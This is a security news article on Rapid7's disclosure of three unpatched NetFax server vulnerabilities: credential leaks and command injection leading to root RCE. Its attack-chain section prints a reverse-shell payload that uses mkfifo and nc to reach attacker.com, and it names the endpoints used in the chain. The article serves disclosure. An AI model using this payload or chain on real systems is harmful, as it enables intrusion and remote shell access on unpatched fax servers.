Ddos 
Image: Rapid7
Security researchers at Rapid7 have uncovered a troubling trio of vulnerabilities in MICI Network Co., Ltd.’s NetFax server (versions < 3.0.1.0), allowing for root-level remote code execution (RCE) via an authenticated attack chain. In a discouraging turn, the vendor has refused to patch the flaws, advising users instead to avoid internet exposure.
- CVE-2025-48045 – Default Credential Disclosure (CVSS 6.6 – Moderate)
The NetFax server responds to a GET request to /client.php by exposing default administrative credentials in cleartext, a flaw stemming from compatibility with the ‘OneIn’ client. No authentication is needed to obtain these credentials.
“The display of these credentials appeared to be present due to implemented functionality for support of the ‘OneIn’ client,” the disclosure explains.
- CVE-2025-48046 – Stored Password Disclosure (CVSS 5.3 – Moderate)
Though the UI masks SMTP passwords, the actual configuration file (/config.php) leaks them in plaintext. “The configuration file… provided the cleartext password to the user” despite UI redactions.
- CVE-2025-48047 – OS Command Injection via Misconfigured Fields (CVSS 9.4 – Critical)
By inserting backtick-enclosed system commands into parameters like ETHNAMESERVER, attackers can inject arbitrary commands. This leads to full RCE via /test.php, which executes ping and other commands based on unsanitized input.
“The ‘`’ characters had not been sanitized. This led to remote code execution via command injection,” the disclosure warns.
The attack chain is below:
- The attacker first obtains credentials via client.php.
- Injects a payload like \mkfifo /tmp/x; nc attacker.com 4444 0</tmp/x | /bin/sh >/tmp/x 2>&1;“ into the config.
- Executes the injected command by triggering /test.php.
“A reverse shell was obtained through these methods after the existence of the ‘mkfifo’ and ‘nc’ binaries were confirmed,” the report states.
A Metasploit module is already in development and will support both authenticated and unauthenticated exploitation using default credentials.
NetFax is a network fax solution developed in Taiwan, designed to route fax messages through email. While only 34 internet-exposed systems were discovered, the actual footprint is believed to be significantly larger in internal enterprise environments, especially across Asia and the Middle East.
Rapid7 also identified other systems running the same wfaxd architecture, including CoFax Server instances in Iran, though they did not appear vulnerable from passive analysis.
Rapid7 attempted multiple times to contact MICI with no response. TWCERT ultimately mediated, only to receive a stark statement:
“…they (MICI) have responded that they will not address the vulnerability in this product… They stated that they will no longer respond to inquiries regarding this product.”
Rather than fix the issues, MICI advised customers not to expose NetFax to external networks.
However, as Rapid7 notes:
“These vulnerabilities could also be exploited from an internal network perspective… resulting in administrative access to the underlying server.”
Related Posts:
- Zoom Customers Advised to Update Software to Fix Security Vulnerabilities
- Kimsuky APT: New TTPs Revealed in Rapid7 Cybersecurity Report
- PLANET Technology Switches Face CVE-2024-8456 (CVSS 9.8), Urgent Firmware Updates Advised
- Cybercriminals Evolve Social Engineering Tactics, Exploit CVE-2022-26923 in Sophisticated Campaign
- CVE-2024-38094 Exploited: Attackers Gain Domain Access via Microsoft SharePoint Server
Donate